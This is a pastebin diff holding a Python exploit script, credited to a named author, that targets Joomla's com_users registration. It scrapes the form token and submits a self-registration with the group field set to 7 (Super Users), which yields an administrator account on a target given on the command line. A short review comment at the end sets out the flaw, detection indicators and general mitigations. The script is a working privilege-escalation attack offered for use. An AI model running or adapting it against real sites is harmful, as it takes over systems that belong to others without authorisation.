View difference between Paste ID: DDSSaw0v and 9xNxVenC
1
Video http://www.youtube.com/watch?v=jg6_MN1wQxI&feature=youtu.be
2
3
#!/usr/bin/python
4
# Joomla Com_User Auto Exploit =D
5
# By Xtroj-EnTn
6
7
import requests as sec4ever, re, urllib, sys, os
8
from threading import Thread 
9
from time import sleep
10
def cls():
11
	os.system(['clear','cls'][os.name =='nt'])
12
13
cls()
14
print '''
15
16
                    Joomla Com_User Auto Exploiter 
17
#Contact Me: Virus-Tn@hotmail.com
18
#Greets: Zisahn Rider - Hatem Dridi  
19
Facebook : https://www.facebook.com/profile.php?id=100007271865841
20
#Coded By: Xtroj-EnTn'''
21
22
pwd2 = 'fio3jfiej9cewc9c9w0eufew9u'
23
def one(target,pwd1,pwd2,email):
24
	# Wrong Password
25
	x1 = xsec.get(target+'/index.php?option=com_users&view=registration')
26
	token = re.findall('type="hidden" name="(.*?)" value="1"', x1.text)
27
	post = {}
28
	post["jform[name]"] = 'Xtroj'
29
	post["jform[username]"] = user
30
	post["jform[password1]"] = pwd1
31
	post["jform[password2]"] = pwd2
32
	post["jform[email1]"] = email
33
	post["jform[email2]"] = email
34
	post["jform[groups][]"] = "7"
35
	post["option"] = "com_users"
36
	post["task"] = "registration.register"
37
	post[token[0]] = "1"
38
	p1 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post))
39
	x2 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')
40
41
def exploit(target,pwd1,pwd2,email):
42
	# Wrong Password
43
	x3 = xsec.get(target+'/index.php?option=com_users&view=registration')
44
	token = re.findall('type="hidden" name="(.*?)" value="1"', x3.text)
45
	post = {}
46
	post["jform[name]"] = 'Xtroj'
47
	post["jform[username]"] = user
48
	post["jform[password1]"] = pwd1
49
	post["jform[password2]"] = pwd1
50
	post["jform[email1]"] = email
51
	post["jform[email2]"] = email
52
	post["jform[groups][]"] = "7"
53
	post["option"] = "com_users"
54
	post["task"] = "registration.register"
55
	post[token[0]] = "1"
56
	p2 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post))
57
	x4 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')
58
59
xsec = sec4ever.session()
60
if len(sys.argv) == 5:
61
	target = sys.argv[1]
62
	user = sys.argv[2]
63
	pwd1 = sys.argv[3]
64
	email = sys.argv[4]
65
	one(target,pwd1,pwd2,email)
66
	ex = exploit(target,pwd1,pwd2,email)
67
	print '[*] Go To Your Email & Active Then Login :D\nUsername: '+user+' & Password: '+pwd1
68
else:
69
	print "Usage: python tool.py http://www.victime.com/ youruser yourpass yourmail"
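Review bot: The only comment in both functions is `# Wrong Password`, which is inaccurate in `exploit()` (it sends `pwd1` in both password fields) and leaves the one security-relevant field, `post["jform[groups][]"] = "7"`, undocumented. A comment on that line such as `# client-supplied group id; the server must ignore jform[groups] on self-registration` would state the flaw the script relies on. For defenders, the indicators visible here are a POST to `index.php?option=com_users&view=registration` carrying a `jform[groups][]` parameter (which, as far as I know, the stock registration form never submits), a failed registration followed at once by a successful one in the same session, and the hard-coded display name `Xtroj`. The page names no affected version or advisory, so the mitigation that can be stated is general: run a fixed Joomla release, disable self-registration where it is not needed, and audit accounts that hold privileged groups.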